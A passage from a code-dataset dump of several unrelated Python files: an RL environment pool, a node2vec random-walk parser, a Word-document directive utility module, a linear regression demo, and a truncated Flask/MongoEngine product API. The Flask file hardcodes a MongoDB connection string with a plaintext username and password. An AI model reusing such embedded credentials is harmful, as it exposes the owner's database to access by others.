= [math.pow(self.hyper_params.gamma, idx) * explore_step[\"reward\"]\n for idx, explore_step in enumerate(explored)]\n future_reward = np.cumsum(weighted_reward[-1::-1])[-1::-1] # reverse cumsum\n return future_reward\n\n\n @abstractmethod\n def reset(\n self,\n *,\n seed: Optional[int] = None,\n options: Optional[dict] = None,\n ) -> Union[ObsType, Tuple[ObsType, dict]]:\n \"\"\"\n Reset the environment's state.\n Note that this differs from the `reset` method of `gym.Env`, which returns None\n if the random state is exhausted.\n Returns:\n observation (object): the initial observation.\n\n Args:\n seed:\n return_info:\n options:\n\n Returns:\n\n 
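(observation, info): the initial observation plus an auxiliary info dict,\n            mirroring the reset API of gym >= 0.26 (cf. TMBatchEnvironment.reset below).\n        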
\"\"\"\n\n pass\n\n @abstractmethod\n def step(\n self, action: ActType,\n ) -> Tuple[List[ObsType], List[float], List[bool], List[bool], List[dict]]:\n \"\"\"\n Run one timestep of the environment's dynamics.\n Accepts an action and returns a tuple (observation, reward, terminated, truncated, info).\n \"\"\"\n\n raise Exception(\"Not implemented\")\n\n\n\nclass TMBatchEnvironment(TMEnvironment):\n \"\"\"\n TMBatchEnvironment\n \"\"\"\n\n ObservationBatchTraits = TMSampleBatchTraits\n ActionBatchTraits = TMSampleBatchTraits\n\n def __init__(self, hyper_params=None, envs: TMEnvironmentInterface=None,\n scenario=TMScenario.Learning, eval=False, states=None):\n super().__init__(hyper_params=hyper_params, scenario=scenario, eval=eval, states=states)\n\n self.__envs = envs\n\n\n def batch_size(self):\n return len(self.__envs)\n\n # def __getattr__(self, attr):\n #\n # values = [getattr(env, attr) for env in self.__envs]\n # if isinstance(values[0], (types.FunctionType, types.MethodType)):\n # def wrapper(*args, **kwargs):\n # results = []\n # for idx, func in enumerate(values):\n # result = func(*[arg[idx] for arg in args], **dict((k, v[idx]) for k, v in kwargs.items()))\n # results.append(result)\n # return results\n # return wrapper\n # else:\n # return values\n #\n # def __setattr__(self, key, value):\n #\n # for env in self.envs:\n # setattr(env, key, value)\n\n def reset(\n self,\n *args,\n seed: Optional[int] = None,\n options: Optional[dict] = None,\n ) -> List[ObsType]:\n\n results = list(zip(* [env.reset(*args, seed=seed, options=options)\n for env in self.__envs\n ]))\n\n observation, info = results\n observation = self.ObservationBatchTraits.batch(list(observation))\n\n return observation, info\n\n\n def step(\n self, action_batch: ActType,\n batch_mask: Optional[Union[List[bool], np.ndarray, T.Tensor]] = None,\n ) -> Tuple[List[ObsType], List[float], List[bool], List[bool], List[dict]]:\n\n actions = self.ActionBatchTraits.unbatch(action_batch)\n\n if batch_mask is None:\n batch_mask = [False] * self.batch_size()\n\n step_results = list(zip(*[env.step(act) if not batch_mask[idx] else [None, 0.0, True, True, {}]\n for idx, (env, act) in enumerate(zip(self.__envs, actions))]))\n\n observation, reward, terminated, truncated, info = step_results\n\n batch_mask = [batch_mask[idx] or terminated[idx] or truncated[idx] for idx in range(self.batch_size())]\n\n observation_batch = self.ObservationBatchTraits.batch(observation)\n\n reward = T.to_tensor(reward)\n terminated = T.to_tensor(terminated)\n truncated = T.to_tensor(truncated)\n\n return observation_batch, reward, terminated, truncated, info\n\n def close(self):\n\n for env in self.__envs:\n env.close()\n\n def future_reward(self, explored):\n \"\"\"\n Args:\n rewards:\n\n Returns:\n\n \"\"\"\n \n weighted_reward = T.stack([math.pow(self.hyper_params.gamma, idx) * explore_step[\"reward\"]\n for idx, explore_step in enumerate(explored)], dim=-1)\n\n future_reward = T.flip(T.cumsum(T.flip(weighted_reward, dims=[-1]),dim=-1), dims=[-1]) # reverse cumsum\n\n return future_reward.float()\n\nclass TMEnvironmentPool(TMSerializableComponent):\n \"\"\"\n TMEnvironmentPool: preserve a pool of environments for training\n the environments may be identical or different.\n \"\"\"\n\n def __init__(self, hyper_params, name: str,\n envs= None,\n scenario=TMScenario.Learning,\n eval=False,\n states=None):\n super().__init__(hyper_params, scenario=scenario, states=states)\n\n self.__name = name\n self.__scenario = None\n self.__eval = eval\n self.__envs 
= envs if envs else []\n if states:\n self.load_states(states)\n\n def reuse(self):\n pass \n\n @property\n def name(self):\n return self.__name\n\n @property\n def scenario(self):\n return self.__scenario\n\n @property\n def eval(self):\n return self.__eval\n\n @property\n def envs(self):\n return self.__envs\n\n def choose(self, sample_num):\n\n indexes = list(range(len(self.__envs)))\n shuffle(indexes)\n\n for index_chunk in chunked(indexes, sample_num):\n yield TMBatchEnvironment(envs=[self.__envs[index] for index in index_chunk])\n\n @abstractmethod\n def test(self, test_config):\n pass\n\n\nclass TMEnvironmentPoolGroup(TMSerializableComponent):\n \"\"\"\n TMDataStream\n Some thoughts, but not feasible: \"Note: as a fundamental components of TM which across all the data pipeline,\n it should not be subclassed and change its default behavior.\n For old code, please load the data in TMOfflineInputStream and then\n return a TMDataStream\"\n \"\"\"\n\n def __init__(self, hyper_params=None, scenario=TMScenario.Learning,\n eval=False,\n states=None):\n\n super().__init__(hyper_params)\n\n self._pools = dict()\n self._scenario = scenario\n self._eval = eval\n \n\n if states is not None:\n self.load_states(states)\n logger.info(\"add sampled training eval channel \")\n\n # if self.hyper_params.train_sample_ratio_for_eval or self.hyper_params.train_sample_ratio_for_eval > 0:\n # ratio = self.hyper_params.train_sample_ratio_for_eval\n # self.add_sampled_training_eval_channels(ratio)\n\n logger.info(\"sampled training eval channel added\")\n\n\n def choose(self, sample_num, eval=False):\n\n if eval:\n pools = self.eval_pools\n else:\n if self.scenario == TMScenario.Learning:\n pools = self.learn_pools\n elif self.scenario == TMScenario.Inference:\n pools = self.inference_pools\n else:\n raise Exception(\"Unknown scenario with eval=False\")\n\n for pool_name in pools:\n yield from self[pool_name].choose(sample_num=sample_num)\n\n\n @property\n def scenario(self):\n return self._scenario\n\n @property\n def eval(self):\n return self._eval\n\n @property\n def pools(self):\n return self._pools.keys()\n\n\n def add_sampled_learning_eval_pools(self, ratio=None):\n \n if ratio is None:\n ratio = self.hyper_params.train_sample_ratio_for_eval\n if not ratio or (isinstance(ratio, (int, float)) and ratio < 0):\n return\n \n import random, copy\n sampled_channels = []\n for channel in self.eval_pools:\n assert channel in self._pools\n \n sampled = [copy.deepcopy(env) for env in self._pools[channel].envs\n if random.random() < ratio]\n if len(sampled) <= 0:\n continue\n \n key = f\"{channel}#sampled\"\n sampled_channels.append(key)\n self._pools[key] = TMEnvironmentPool(hyper_params=None, name=key,\n envs=sampled, scenario=self.scenario,\n eval=self.eval)\n\n \n self.hyper_params.eval_pools = list(set(list(self.hyper_params.eval_pools) + sampled_channels))\n\n @property\n def learn_pools(self):\n return self.hyper_params.learn_pools if self.hyper_params.learn_pools else []\n\n @learn_pools.setter\n def learn_pools(self, value):\n self.hyper_params.learn_pools = tuple(value)\n\n @property\n def eval_pools(self):\n return self.hyper_params.eval_pools if self.hyper_params.eval_pools else []\n\n @eval_pools.setter\n def eval_pools(self, value):\n self.hyper_params.eval_pools = tuple(value)\n\n @property\n def inference_pools(self):\n return self.hyper_params.inference_pools if self.hyper_params.inference_pools else []\n\n @inference_pools.setter\n def inference_pools(self, value):\n 
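# keep as an immutable tuple, mirroring the learn_pools/eval_pools setters\n        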
self.hyper_params.inference_pools = tuple(value)\n\n    def __getitem__(self, item):\n\n        return self._pools[item]\n\n    def __setitem__(self, key, value):\n        if not isinstance(value, TMEnvironmentPool):\n            value = TMEnvironmentPool(hyper_params=None, name=key,\n                                      envs=value, scenario=self.scenario,\n                                      eval=self.eval)\n\n        self._pools[key] = value\n\n    def test(self, test_config):\n\n        for k, v in self._pools.items():\n            v.sample_num = test_config.sample_num\n\n        self.add_sampled_learning_eval_pools(ratio=1)\n\n    def states(self):\n        for k, v in self._pools.items():\n            v.reuse()\n\n        return {\"pools\": {k: v.envs for k, v in self._pools.items() if not k.endswith(\"#sampled\")},\n                \"eval\": self._eval, \"scenario\": self._scenario.name}\n\n    def secure_hparams(self):\n        import copy\n        hyper_params = copy.deepcopy(self.hyper_params)\n        for channel in hyper_params.channels:\n            hyper_params.channels[channel] = [k for k in hyper_params.channels[channel]\n                                              if not k.endswith(\"#sampled\")]\n        return hyper_params\n\n    def load_states(self, states):\n        self._scenario = TMScenario[states[\"scenario\"]]\n        self._eval = states[\"eval\"]\n        self._pools = {k: TMEnvironmentPool(hyper_params=None, name=k,\n                                            envs=v, scenario=self.scenario, eval=self._eval)\n                       for k, v in states[\"pools\"].items() if not k.endswith(\"#sampled\")}\n","repo_name":"baidu-research/tripmaster","sub_path":"tripmaster/core/components/environment/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":13626,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"36434073491","text":"\n\ndef parse_graph(graph_string):\n    \"\"\"\n    Part used to generate the random walks.\n    :param graph_string:\n    :return:\n    \"\"\"\n    parts = graph_string.split(\"\\t\")\n    # parts[0]: unclear, but it should be an id?\n    # parts[1]: some users\n    # parts[2]: looks like a year?\n    # parts[3]: does not look like a user id, maybe a timestamp?\n\n    edge_strs = parts[4].split(\" \")\n    # src id: tgt id:1\n\n    node_to_edges = dict()\n    for edge_str in edge_strs:\n        edge_parts = edge_str.split(\":\")\n        source = int(edge_parts[0])\n        target = int(edge_parts[1])\n\n        if not source in node_to_edges:\n            neighbors = list()\n            node_to_edges[source] = neighbors\n        else:\n            neighbors = node_to_edges[source]\n        neighbors.append((target, get_global_degree(target)))\n        # node_to_edges: src -> (tgt, tgt degree)\n        # what is this dict actually for?\n\n\n    nx_G = nx.DiGraph()\n    for source, nbr_weights in node_to_edges.items():\n        # is this the old-style dict.items()?\n        for nbr_weight in nbr_weights:\n            target = nbr_weight[0]\n\n            if opts.trans_type == 0:  # isn't trans_type a string? why is it 0/1/2 here?\n                edge_weight = get_edge_weight(source, target) + pseudo_count\n                weight = edge_weight\n            elif opts.trans_type == 1:\n                target_nbrs = node_to_edges.get(target, None)\n                local_degree = 0 if target_nbrs is None else len(target_nbrs)\n                local_degree += pseudo_count\n                weight = local_degree\n            else:\n                global_degree = nbr_weight[1] + pseudo_count\n                weight = global_degree\n            # the branches correspond to edge, deg, DEG respectively\n            nx_G.add_edge(source, target, weight=weight)\n            # a weight is defined for each edge here, used to compute the transition probabilities\n\n    # List of the starting nodes.\n    roots = list()\n    # List of the starting nodes excluding nodes without outgoing neighbors.\n    roots_noleaf = list()\n    # exclude?\n\n    str_list = list()\n    str_list.append(parts[0])\n\n    probs = list()\n    probs_noleaf = list()\n    weight_sum_noleaf = 0.0\n    weight_sum = 0.0\n\n    # Obtain sampling probabilities of roots.\n    for node, weight in nx_G.out_degree(weight=\"weight\"):\n        org_weight = weight\n        if weight == 0: weight += pseudo_count\n        weight_sum += weight\n        if org_weight > 0:\n            weight_sum_noleaf += weight\n\n
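    # Second pass (summary comment added for clarity): each node's out-degree\n    # weight is normalized into a root-sampling probability; leaf nodes stay in\n    # roots/probs but are excluded from the *_noleaf lists.\n    for node, weight in 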
nx_G.out_degree(weight=\"weight\"):\n        org_weight = weight\n        if weight == 0: weight += pseudo_count\n        roots.append(node)\n        prob = weight / weight_sum\n        probs.append(prob)\n        if org_weight > 0:\n            roots_noleaf.append(node)\n            prob = weight / weight_sum_noleaf\n            probs_noleaf.append(prob)\n\n    sample_total = opts.walks_per_graph\n    first_time = True\n    G = node2vec.Graph(nx_G, True, opts.p, opts.q)\n    G.preprocess_transition_probs()\n\n    while True:\n        if first_time:\n            first_time = False\n            node_list = roots\n            prob_list = probs\n        else:\n            node_list = roots_noleaf\n            prob_list = probs_noleaf\n        n_sample = min(len(node_list), sample_total)\n        if n_sample <= 0: break\n        sample_total -= n_sample\n\n        sampled_nodes = np.random.choice(node_list, n_sample, replace=False, p=prob_list)\n        walks = G.simulate_walks(len(sampled_nodes), opts.walk_length, sampled_nodes)\n        for walk in walks:\n            str_list.append(' '.join(str(k) for k in walk))\n    return '\\t'.join(str_list)\n\n","repo_name":"1170500820/DLtools","sub_path":"utils/graph/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"4237221320","text":"\n# Standard library\nimport os\nimport sys\nimport json\nfrom json import JSONDecodeError\nimport re\nfrom collections import namedtuple, OrderedDict\n\n# Libraries\nimport pandas as pd\nimport jsonschema\nfrom colorama import Fore\nimport openpyxl\nfrom openpyxl.styles import Alignment, Border, Side, PatternFill, Color\nfrom openpyxl.utils import get_column_letter\n\n# Local\nfrom cascade import quicklog\nfrom cascade.bomstrip import open_and_seek_past_bom\n\nqlog = quicklog.get_logger()\nlprint = qlog.lprint\n\ndef make_json(data_dict, simple=None):\n    \"\"\"Make well formatted JSON for insertion into cascade word docs.\n\n    JSON will be enclosed by '$' like: '${\"key\":\"value\"}$'\n    JSON will be on one line (simple) if it contains only one key/value pair, or if\n    the argument simple==true\n    \"\"\"\n    if simple is None:\n        # Default to simple as long as the JSON contains only one item and\n        # that item is not a dict.\n        simple = False\n        if len(data_dict) <= 1:\n            for key in data_dict:\n                if not isinstance(data_dict[key], dict):\n                    simple = True\n\n    if simple:\n        return '${}$'.format(json.dumps(data_dict, separators=(', ', ':')))\n    return '${}$'.format(json.dumps(data_dict, indent=4, separators=(',', ':'))).replace('${\\n    ', '${')\n\ndef make_json_autoformat(data_dict):\n    \"\"\"Makes JSON formatted for inclusion in a Word doc according to dict content\"\"\"\n    if not is_shortform_dict(data_dict):\n        return make_json(data_dict, simple=False)\n    if 'satisfies' not in data_dict:\n        return make_json(data_dict, simple=True)\n    if len(data_dict['satisfies']) <= 1:\n        return make_json(data_dict, simple=True)\n\n    # Use multi-line formatting because there are multiple 'satisfies' directives\n    json_text = make_json(data_dict, simple=False)\n    # Remove carriage return between \"id\" and \"method\" (for a little more compactness)\n    json_text = json_text.replace(',\\n    \"method\"', ', \"method\"')\n    return json_text\n\ndef json_to_dict(json_text):\n    \"\"\"Parse JSON text and return as a python dict\n\n    On error: logs the error and returns None\n    \"\"\"\n\n    json_dict = None\n    try:\n        json_dict = json.loads(\n            json_text,\n            object_pairs_hook=OrderedDict  # Preserve item order by using an OrderedDict\n        )\n    except JSONDecodeError as err:\n        json_error_text = json_text\n        # Show error location for errors of the form:\n        # 
\"Reported JSON decode error: Expecting ',' delimiter: line 1 column 89 (char 88)\"\n        # pylint: disable=locally-disabled, anomalous-backslash-in-string\n        result = re.search('line (?P<line>\\d+) column (?P<column>\\d+) \\(char (?P<char_loc>\\d+)\\)', str(err))\n        if result:\n            # Colorize the break between good/bad text\n            json_error_text = (\n                Fore.GREEN +\n                json_text[:int(result.group('char_loc'))] +\n                Fore.RESET +\n                Fore.RED +\n                json_text[int(result.group('char_loc')):] +\n                Fore.RESET\n            )\n\n        qlog.error('Could not decode cascade directive (JSON parsing encountered error).'\n                   + '\\n   Reported JSON decode error: {}'.format(err)\n                   + '\\n   JSON string being parsed:'\n                   + '\\n   {}'.format(json_error_text)\n                   + '\\n   JSON string with whitespace condensed:'\n                   + '\\n   {}'.format(' '.join(json_error_text.split()))\n                   )\n    return json_dict\n\ndef extract_json_from_directive(text):\n    '''Take a string of form \"${<json>}$\" and return \"{<json>}\" '''\n    if '${' not in text or '}$' not in text:\n        raise ValueError('Expected directive to contain \"${\" and \"}$\"')\n    return '{' + text.split('${')[1].split('}$')[0] + '}'\n\ndef extract_directives_from_text(text):\n    '''Return all directives appearing in a string of text\n\n    Returns a list of all substrings of the form '${<json>}$'\n    Example: 'Spam ${eggs}$ SpAm ${SPAM}$ eggs and spam' --> ['${eggs}$', '${SPAM}$']\n    '''\n    return re.findall(r\"(?P<directive>\\${.+?}\\$)\", text)\n\ndef directive_to_dict(text):\n    json_text = text.strip()\n    if json_text.startswith('${') and json_text.endswith('}$'):\n        json_text = json_text.strip('$')\n        json_dict = json_to_dict(json_text)\n        return json_dict\n    return None\n\ndef is_shortform_dict(directive_dict):\n    '''Return True if the dict is a shortform object id dict'''\n    return 'id' in directive_dict\n\ndef expand_shortform_dict(directive_dict):\n    '''Expand a shortform dict into its explicit form'''\n    if not is_shortform_dict(directive_dict):\n        raise ValueError\n    return {'#shortform': directive_dict}\n\ndef get_requirement_id(text, fuzzy=False):\n    \"\"\"Find requirement ID of the general form 'ABC-DEF-1' within a string like '[ABC-DEF-1, X]'\n\n    If fuzzy is false, will only find IDs with a numerical suffix\n    If fuzzy is true, will find any suffix (useful for finding pending\n    annotations of the form ABC-DEF-?)\n\n    Returns the requirement ID if found.\n    Returns None otherwise.\n    \"\"\"\n    if fuzzy:\n        regex = r\"^\\s*\\[\\s*(?P<requirement_id>[\\w\\.]+-[\\w\\.]+-\\S*)\\s*,.+]\\s*$\"\n    else:\n        regex = r\"^\\s*\\[\\s*(?P<requirement_id>[\\w\\.]+-[\\w\\.]+-\\d+)\\s*,.+]\\s*$\"\n    result = re.search(regex, text)\n    if result:\n        return result.group('requirement_id')\n    return None\n\ndef legacy_object_id_to_directive_dict(text):\n    '''Convert a legacy object ID to a Cascade directive dict\n\n    Returns None if object ID format is not parseable\n    '[SRD-RCN-0001, X]' --> {'id':'SRD-RCN-0001', 'method':'X'}\n    '[SRD-RCN-3186, X, GUI]' --> {'id':'SRD-RCN-3186', 'method':'X', 'type':'GUI'}\n    '[SRD-RCN-4843, X, RSG-3895]' --> {'id':'SRD-RCN-4843', 'method':'X', 'old_id':'RSG-3895'}\n    '[SRD-RCN-4845, X, APP_B-8439, RSG]' --> {'id':'SRD-RCN-4845', 'method':'X', 'old_id':'APP_B-8439', 'type':'RSG'}\n\n    '''\n    requirement_types = ['RSG', 'SYS', 'GUI', 'BIT', 'RLI', 'RSG', 'SR']\n    pieces = text.strip().strip('[').strip(']').split(',')\n    pieces = [piece.strip() for piece in pieces]\n    if len(pieces) not in (2, 3, 4):\n        qlog.error('Ignoring legacy Object ID item: \"{}\".'.format(text) +\n                   ' Expected to find 2, 3, or 4 items in brackets but found {}: {}'.format(\n                       len(pieces), pieces) + '.' 
+\n ' You must correct this field to contain the expected items.')\n return None\n else:\n if len(pieces) == 2:\n # Form: '[SRD-RCN-0001, X]'\n directive_dict = OrderedDict([\n ('id', pieces[0]),\n ('method', pieces[1])])\n elif len(pieces) == 3:\n if pieces[2] in requirement_types:\n # Form: '[SRD-RCN-3186, X, GUI]'\n directive_dict = OrderedDict([\n ('id', pieces[0]),\n ('method', pieces[1]),\n ('type', pieces[2]),\n ])\n else:\n # Form: '[SRD-RCN-4843, X, RSG-3895]'\n directive_dict = OrderedDict([\n ('id', pieces[0]),\n ('method', pieces[1]),\n ('old_id', pieces[2]),\n ])\n elif len(pieces) == 4:\n # Form: '[SRD-RCN-4845, X, APP_B-8439, RSG]'\n if pieces[3] not in requirement_types:\n qlog.warning('Unexpected requirement type in 4th field of legacy object id: \"{}\". Expected one of: {}'.format(\n text,\n requirement_types))\n directive_dict = OrderedDict([\n ('id', pieces[0]),\n ('method', pieces[1]),\n ('old_id', pieces[2]),\n ('type', pieces[3]),\n ])\n else:\n qlog.error('Unexpected legacy object ID format. Expected 2, 3, or 4 fields. Object ID will be ignored: \"{}\"'.format(text))\n return None\n return directive_dict\n\ndef list_to_range_tuples(item_list):\n '''Given a sorted list of numbers, return a list of range tuples spanning all numbers in the list\n Group contiguous paragraph indices to create a list of tuples where each tuple\n specifies a range of paragraphs to purge\n Example: [100,99,98,70,49,48,47,29,28,2] --> [ (100,98), (70,70), (49,47), (29,28), (2,2) ]\n '''\n sorted_unique = sorted(list(set(item_list)), reverse=True)\n ranges = []\n range_in_progress = False\n first = None\n previous = None\n for i in sorted_unique:\n if not range_in_progress:\n first = i\n previous = i\n range_in_progress = True\n continue\n else:\n if i == previous - 1:\n previous = i\n continue\n else:\n # i is not in current range\n # Save previous range\n ranges.append((first, previous))\n # Begin a new range\n first = i\n previous = i\n # Save the final range\n ranges.append((first, previous))\n return ranges\n\nclass Indent:\n '''Print/Format indentation manager'''\n\n def __init__(self):\n self.level = 0\n\n def inc(self):\n '''Increment indentation inward'''\n self.level += 1\n\n def dec(self):\n '''Decrement indentation outward'''\n self.level = max(self.level-1, 0)\n\n def print(self, text):\n '''Print with current indentation'''\n print('{}{}'.format(self.__repr__(), text))\n\n def format(self, text):\n '''Format with current indentation'''\n return '{}{}'.format(self.__repr__(), text)\n\n def __repr__(self):\n '''Return current indentation pad string'''\n return ' ' * self.level\n\ndef get_heading_level(stylename):\n '''Determines whether a stylename is a heading style. 
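For example (illustrative): 'Heading 2' -> 2, 'Appendix_A_Level_3' -> 3, 'Body Text' -> None.\n    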
Returns heading number if true, else None\n    '''\n\n    # Headings of the form 'Heading N'\n    if stylename.startswith('Heading'):\n        return int(stylename.split(' ')[-1])\n    # Headings of the form 'Appendix_A_Level_N'\n    if stylename.startswith('Appendix_') and 'Level_' in stylename:\n        return int(stylename.split('_')[-1])\n    return None\n\ndef to_snippet(text, length=40):\n    '''Truncate text to requested length and append \"...\"\n    '''\n    if len(text) < length:\n        return text\n    return text[:min(len(text), length-3)] + '...'\n\nSplitline = namedtuple('Splitline', 'text delimiter')\n\ndef mutlisplit(text, delimiter_list, preserve_delimiters=True):\n    result_list = [Splitline(text, '')]\n    for delimiter in delimiter_list:\n        new_result_list = []\n        for item in result_list:\n            new_items = [Splitline(text, delimiter) for text in item.text.split(delimiter)]\n            new_items[-1] = Splitline(new_items[-1].text, item.delimiter)\n            new_result_list += new_items\n        result_list = new_result_list\n\n    if preserve_delimiters:\n        return [item.text + item.delimiter for item in result_list]\n    else:\n        return [item.text for item in result_list]\n\ndef represents_int(s):\n    \"\"\"Return true if string represents an integer\"\"\"\n    try:\n        int(s)\n        return True\n    except ValueError:\n        return False\n\ndef get_directive_type(directive):\n    \"\"\"Given a dict containing a directive, return the directive type\n\n    Directives have the form {'<directive type>': <directive content>}\n    Example: {'#requirement': {...}} --> '#requirement'\n    \"\"\"\n    keys = list(directive.keys())\n    if len(keys) != 1:\n        raise ValueError('Expected directive dict to contain a single key: {}'.format(directive))\n    return keys[0]\n\n\n\"\"\"\nThis is a python dictionary which declares the JSON schema for the \"document_info\"\ndirective appearing in Cascade word documents. 
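A minimal conforming example\n(illustrative only; the 'SRD-RCN-' prefix is borrowed from examples elsewhere\nin this module) is:\n\n    {\"#document_info\": {\"object_ids\": [{\"prefix\": \"SRD-RCN-\", \"next_id\": 1}],\n                        \"schemas\": [{\"title\": \"#requirement\"}]}}\n\n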
\"JSON schema\" is a standardized\nformat for declaring constraints on the information present in a given JSON object.\nThis schema defines what constitutes a properly formed \"document_info\" directive.\n\n    References:\n        * http://json-schema.org/\n            Definition of the \"JSON schema\" format\n\n        * https://spacetelescope.github.io/understanding-json-schema/\n            A very readable explanation of the \"JSON schema\" format\n\n        * https://github.com/Julian/jsonschema\n            The Python library used herein for \"JSON schema\" processing\n\n\"\"\"\nSCHEMA__DOCUMENT_INFO = {\n    \"title\": \"(HEAD)\",\n    \"type\": \"object\",\n    \"properties\":{\n        \"#document_info\":{\n            \"type\": \"object\",\n            \"properties\":{\n                \"object_ids\":{\n                    \"type\": \"array\",\n                    \"items\": {\n                        \"type\": \"object\",\n                        \"properties\":{\n                            \"prefix\": {\n                                \"type\": \"string\",\n                                \"pattern\": \"^.+-$\"\n                            },\n                            \"next_id\": {\n                                \"type\": \"integer\"\n                            }\n                        },\n                        \"required\": [\"prefix\", \"next_id\"],\n                        \"additionalProperties\": False\n                    }\n                },\n                \"schemas\":{\n                    \"type\": \"array\",\n                    \"items\": {\n                        \"type\": \"object\",\n                        \"properties\":{\n                            \"title\":{\n                                \"type\": \"string\",\n                                \"pattern\": \"^(#shortform|#section|#requirement)$\"\n                            }\n                        },\n                        \"required\": [\"title\"]\n                    }\n                },\n            },\n            \"required\": [\"object_ids\", \"schemas\"],\n            \"additionalProperties\": False,\n        },\n    },\n    \"required\": [\"#document_info\"],\n    \"additionalProperties\": False\n}\n\nSCHEMA__PRAGMA = {\n    \"title\": \"#pragma\",\n    \"type\": \"string\"\n}\n\ndef validate_json(json_dict, schema):\n    validation_passed = True\n    try:\n        jsonschema.validate(json_dict, schema)\n    except jsonschema.exceptions.ValidationError as err:\n        #TODO: Log validation error detail more cleanly\n        qlog.error('JSON Validation Failed:\\n' + str(err))\n        validation_passed = False\n    return validation_passed\n\ndef uprint(text):\n    \"\"\"Print Unicode to stdout, replacing errors for un-encodable characters\"\"\"\n    print(text.encode(sys.stdout.encoding, errors='replace'))\n\ndef add_suffix_to_filename(filename, suffix_text):\n    \"\"\"Append a suffix to a filename\n\n    The suffix is appended before the file extension (if one exists)\n\n    Examples:\n        add_suffix_to_filename('my_file.txt', '_old') -> 'my_file_old.txt'\n        add_suffix_to_filename('my_file', '_old') -> 'my_file_old'\n\n    Args:\n        filename: Filename string\n        suffix_text: Suffix string to append\n\n    Returns\n        Modified filename\n    \"\"\"\n    if not '.' in filename:\n        return filename + suffix_text\n    pieces = filename.split('.')\n    return '.'.join(pieces[:-1]) + suffix_text + '.' + pieces[-1]\n\ndef make_output_file_info(out_filename, output_argument, append_suffix, replace_extension=None):\n    ''' Determine the appropriate output filename and path for a Cascade command\n\n    Arguments:\n        out_filename:\n            The nominal output filename. May also contain a full path. This is very\n            typically the input filename combined with an append_suffix option.\n        output_argument:\n            The output filename command line argument (in the case of the http interface,\n            the command line argument is used to inject the target output directory).\n            May be a path, a filename, or a path and a filename. If a path and/or\n            filename is specified, then they each individually OVERRIDE the path and filename\n            specified by out_filename.\n        append_suffix:\n            Will be appended to out_filename (before its file extension) BEFORE output_argument\n            is parsed (which could override the out_filename)\n            e.g. 
out_filename='test.txt' append_suffix='_NEW' => 'test_NEW.txt'\n        replace_extension:\n            If supplied, replaces the extension of out_filename BEFORE output_argument\n            is parsed (which could override the out_filename)\n            e.g. out_filename='test.txt' replace_extension='rst' => 'test.rst'\n\n    Returns:\n        A dict containing 'path', 'filename', 'path_and_filename'\n    '''\n    out_path, out_filename = os.path.split(out_filename)\n    if append_suffix:\n        out_filename = add_suffix_to_filename(out_filename, append_suffix)\n\n    if replace_extension:\n        out_filename = '.'.join(out_filename.split('.')[:-1]) + '.' + replace_extension\n\n    if output_argument:\n        if os.path.isdir(output_argument):\n            # Output specified a path only.\n            out_path = output_argument\n        else:\n            # Output specified either a file or a path and file\n            out_path, out_filename = os.path.split(output_argument)\n\n    return dict(\n        path=out_path,\n        filename=out_filename,\n        path_and_filename=os.path.join(out_path, out_filename)\n    )\n","repo_name":"epmoyer/cascade","sub_path":"web/cascade/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":17299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"28431224049","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_iris\nfrom matplotlib import pyplot as plt\nfrom LinearRegressionSkeleton import LinearRegression\n\niris = load_iris()\nlin_reg = LinearRegression(lr=0.1)\n\ndf = pd.DataFrame(iris.data, columns=iris.feature_names)\n\nX = df[\"petal width (cm)\"].values\ny = df['sepal length (cm)'].values\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\nlin_reg.fit(X_train, y_train)\n\npreds = []\nfor x in X_test:\n    preds.append(lin_reg.predict(x))\n\nprint(\"Mean Absolute Error:\", np.mean(np.abs(preds - y_test)))\nprint(\"Mean Squared Error:\", np.mean((preds - y_test)**2))\n\nplt.scatter(X_test, y_test)\nplt.plot([min(X_test), max(X_test)], [min(preds), max(preds)], color='red') # predicted\nplt.show()\n","repo_name":"KareszD/BEVADAT2022232","sub_path":"GYAK/GYAK08/GYAK08.py","file_name":"GYAK08.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"139474381","text":"from flask import Flask, make_response,request,jsonify\r\nfrom flask_mongoengine import MongoEngine\r\n\r\n\r\napp = Flask(__name__)\r\napp.config[\"MONGODB_HOST\"] = \"mongodb+srv://haythem:haythem@cluster0.q4qnp.mongodb.net/myFirstDatabase?retryWrites=true&w=majority\"\r\ndb = MongoEngine()\r\ndb.init_app(app)\r\n\r\n\r\nclass Product(db.Document):\r\n    prod_id = db.IntField()\r\n    Title = db.StringField()\r\n    Color = db.StringField()\r\n    Price = db.StringField()\r\n\r\n\r\n    def to_json(self):\r\n        # convert the document to JSON\r\n        return {\r\n            \"prod_id\": self.prod_id,\r\n            \"Title\": self.Title,\r\n            \"Color\": self.Color,\r\n            \"Price\": self.Price\r\n        }\r\n    \r\n@app.route('/api/create_product',methods=['POST'])\r\ndef create_product():\r\n    prod = Product(prod_id= 15, Title= \"Nike Air Force 1\",Color= \"White\", Price=\"120\")\r\n    prod.save()\r\n    return make_response(\"\",201)\r\n\r\n@app.route('/api/products',methods=['GET','POST'])\r\ndef api_products():\r\n    if request.method == \"GET\": \r\n        products = []\r\n        for product in Product.objects:\r\n            products.append(product)\r\n        return make_response(jsonify(products),200)\r\n    elif request.method == \"POST\": 
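# create a product from the posted JSON body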
